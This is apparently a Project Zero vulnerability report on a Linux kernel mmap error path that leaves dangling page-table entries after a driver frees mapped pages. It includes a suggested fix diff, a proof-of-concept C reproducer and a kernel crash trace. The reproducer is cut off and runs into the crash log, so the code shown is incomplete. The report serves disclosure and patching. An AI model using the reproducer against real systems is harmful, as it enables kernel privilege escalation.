Summary The close_and_free_vma error path for late mmap() failures basically tells drivers to free mapped pages before the corresponding PTEs are zapped. Kernels >=5.10 seem to be affected; but kernels before 6.6 are probably only affected on arm64 devices with MTE enabled, or on SPARC devices with ADI. Starting with 6.6, the path becomes easy to reach on any architecture. I have only tested it on 6.6.56 with a delay hacked into the kernel. Issue description commit deb0f6562884 ("mm/mmap: undo ->mmap() when arch_validate_flags() fails") landed in v6.1, but was backported up to v5.10. This commit introduces the following error path in mmap_region(): +close_and_free_vma: + if (vma->vm_ops && vma->vm_ops->close) + vma->vm_ops->close(vma); unmap_and_free_vma: fput(vma->vm_file); vma->vm_file = NULL; /* Undo any partial mapping done by a device driver. */ unmap_region(mm, mas.tree, vma, prev, next, vma->vm_start, vma->vm_end); This is wrong, because vma->vm_ops->close(vma) can free pages mapped in the region if the region is VM_PFNMAP, while unmap_region() removes the PTEs pointing to those pages. So between those two operations, we can have dangling PTEs. Related context I was looking at this area because of the theoretical issue I mentioned in an earlier bug report that Seth Jenkins discovered: This codepath also does fput() on the mapped file (which may be different from the file specified by the caller) before doing the unmapping, which could theoretically cause similar safety issues - but from what I can tell, in practice, we currently always end up having another reference to the mapped file (held by the caller-specified file), so that is not currently a vulnerability. I think the current version of this code has another bug that has not made it into any release yet: The current version includes close_and_free_vma: if (file && !vms.closed_vm_ops && vma->vm_ops && vma->vm_ops->close) vma->vm_ops->close(vma); which checks for vms.closed_vm_ops (which tracks whether the old VMA has had ->close invoked) to decide whether to call ->close on the new VMA. But that has no security impact because it hasn't made it into a release yet. Impact The commit introducing the issue was backported back to 5.10. The issue leads to dangling PTEs, which could be used to escalate privileges to kernel context if userspace: can trigger this error path has access to a driver that uses the ->vm_ops->close callback to manage buffers mapped writably with VM_PFNMAP, such as GPU drivers or /dev/bus/usb/*/*. To reach this error path, some options are probably: On the 5.10/5.15 LTS tree, only arm64 and sparc can be affected, and only if the system has MTE enabled in the bootloader (on arm64) or supports ADI (on sparc) - the bailout is only triggered by arch_validate_flags(), so other architectures can never reach the bailout path. On the 6.1 LTS tree, we can additionally also reach the bailout path on other architectures if a GFP_KERNEL allocation fails, but that's pretty unlikely. On the 6.6 LTS tree and newer, all architectures can easily hit this path due to the map_deny_write_exec() check. (And since v6.7, mapping_map_writable() failure can also hit this bailout.) Fixing it I think the combination of the fixes required for this code would probably look roughly like this (entirely untested): diff --git a/mm/mmap.c b/mm/mmap.c index 57fd5ab2abe7..bbead78548f6 100644 --- a/mm/mmap.c +++ b/mm/mmap.c @@ -1375,6 +1375,7 @@ unsigned long mmap_region(struct file *file, unsigned long addr, struct maple_tree mt_detach; unsigned long end = addr + len; bool writable_file_mapping = false; + bool vma_opened = false; int error; VMA_ITERATOR(vmi, mm, addr); VMG_STATE(vmg, mm, &vmi, addr, end, vm_flags, pgoff); @@ -1451,6 +1452,7 @@ unsigned long mmap_region(struct file *file, unsigned long addr, error = call_mmap(file, vma); if (error) goto unmap_and_free_vma; + vma_opened = true; if (vma_is_shared_maywrite(vma)) { error = mapping_map_writable(file->f_mapping); @@ -1574,17 +1576,19 @@ unsigned long mmap_region(struct file *file, unsigned long addr, return addr; close_and_free_vma: - if (file && !vms.closed_vm_ops && vma->vm_ops && vma->vm_ops->close) - vma->vm_ops->close(vma); - if (file || vma->vm_file) { + struct file *mapped_file; unmap_and_free_vma: - fput(vma->vm_file); + mapped_file = vma->vm_file; vma->vm_file = NULL; vma_iter_set(&vmi, vma->vm_end); /* Undo any partial mapping done by a device driver. */ unmap_region(&vmi.mas, vma, vmg.prev, vmg.next); + + if (vma_opened && vma->vm_ops && vma->vm_ops->close) + vma->vm_ops->close(vma); + fput(mapped_file); } if (writable_file_mapping) mapping_unmap_writable(file->f_mapping); We might also want to fold the close_and_free_vma and unmap_and_free_vma jump labels together if we instead introduce a flag that tracks whether the VMA has been "opened" like in my suggested diff. Reproducer Tested on v6.6.56. I tested this by adding an artificial delay to my kernel like this to make testing easier: diff --git a/mm/mmap.c b/mm/mmap.c index 6530e9cac458..ac7d75157165 100644 --- a/mm/mmap.c +++ b/mm/mmap.c @@ -47,6 +47,7 @@ #include #include #include +#include #include #include @@ -2899,8 +2900,15 @@ unsigned long mmap_region(struct file *file, unsigned long addr, return addr; close_and_free_vma: + if (strcmp(current->comm, "SLOWME") == 0) + pr_warn("%s: entering close_and_free_vma path\n", __func__); if (file && vma->vm_ops && vma->vm_ops->close) vma->vm_ops->close(vma); + if (strcmp(current->comm, "SLOWME") == 0) { + pr_warn("%s: past ->close(), DELAY BEGIN\n", __func__); + mdelay(2000); + pr_warn("%s: DELAY OVER\n", __func__); + } if (file || vma->vm_file) { unmap_and_free_vma: And then running this reproducer: #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #define SYSCHK(x) ({ \ typeof(x) __res = (x); \ if (__res == (typeof(x))-1) \ err(1, "SYSCHK(" #x ")"); \ __res; \ }) #define MAP_SIZE 0x200000 static char *mmap_area; static void hexdump(void *_data, size_t byte_count) { printf("hexdump(%p, 0x%lx)\n", _data, (unsigned long)byte_count); for (unsigned long byte_offset = 0; byte_offset < byte_count; byte_offset += 16) { unsigned char *bytes = ((unsigned char*)_data) + byte_offset; unsigned long line_bytes = (byte_count - byte_offset > 16) ? 16 : (byte_count - byte_offset); char line[1000]; char *linep = line; linep += sprintf(linep, "%08lx ", byte_offset); for (int i=0; i<16; i++) { if (i >= line_bytes) { linep += sprintf(linep, " "); } else { linep += sprintf(linep, "%02hhx ", bytes[i]); } } linep += sprintf(linep, " |"); for (int i=0; i 0b 48 83 c4 08 5b 5d 41 5c 41 5d 41 5e 41 5f c3 cc cc cc cc 0f All code ======== 0: 48 89 fa mov %rdi,%rdx 3: 48 c1 ea 03 shr $0x3,%rdx 7: 80 3c 02 00 cmpb $0x0,(%rdx,%rax,1) b: 0f 85 88 00 00 00 jne 0x99 11: 48 8b 6b 48 mov 0x48(%rbx),%rbp 15: 40 f6 c5 01 test $0x1,%bpl 19: 0f 84 73 fe ff ff je 0xfffffffffffffe92 1f: 48 83 ed 01 sub $0x1,%rbp 23: e9 6d fe ff ff jmp 0xfffffffffffffe95 28: 0f 0b ud2 2a:* 0f 0b ud2 <-- trapping instruction 2c: 48 83 c4 08 add $0x8,%rsp 30: 5b pop %rbx 31: 5d pop %rbp 32: 41 5c pop %r12 34: 41 5d pop %r13 36: 41 5e pop %r14 38: 41 5f pop %r15 3a: c3 ret [...] RSP: 0018:ffffc90002d37ac0 EFLAGS: 00010202 RAX: 0000000000000001 RBX: ffff88810008b000 RCX: ffffffff9c239e6a RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffff88810008b004 RBP: ffff88810008b000 R08: 0000000000000000 R09: ffffed1020011600 R10: ffff88810008b007 R11: 6d6d203a70616d6d R12: 0000000000000000 R13: dffffc0000000000 R14: fffffbfff444f2d0 R15: ffff88810008b004 FS: 00007f6b13eda740(0000) GS:ffff888189180000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f6b13fa35f0 CR3: 0000000109696002 CR4: 0000000000770ee0 PKRU: 55555554 Call Trace: [...] free_unref_page_prepare (./include/linux/page_table_check.h:41 mm/page_alloc.c:1142 mm/page_alloc.c:2323) free_unref_page (mm/page_alloc.c:2416 (discriminator 1)) dec_usb_memory_use_count (drivers/usb/core/devio.c:201) mmap_region (mm/mmap.c:2906) [...] do_mmap (mm/mmap.c:1383) [...] vm_mmap_pgoff (mm/util.c:556) [...] ksys_mmap_pgoff (mm/mmap.c:1429) [...] do_syscall_64 (arch/x86/entry/common.c:51 (discriminator 1) arch/x86/entry/common.c:81 (discriminator 1)) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:121) [...] Modules linked in: ---[ end trace 0000000000000000 ]--- When I instead run it on a build without CONFIG_PAGE_TABLE_CHECK but with page poisoning enabled (CONFIG_PAGE_POISONING=y plus page_poison=1 on the kernel command line), there is no splat, and the reproducer dumps a bunch of memory full of 0xaa (which is PAGE_POISON, indicating that the pages have been freed). Disclosure deadline This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2025-01-15. For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html Related CVE Number: CVE-2024-53096 Credit: Jann Horn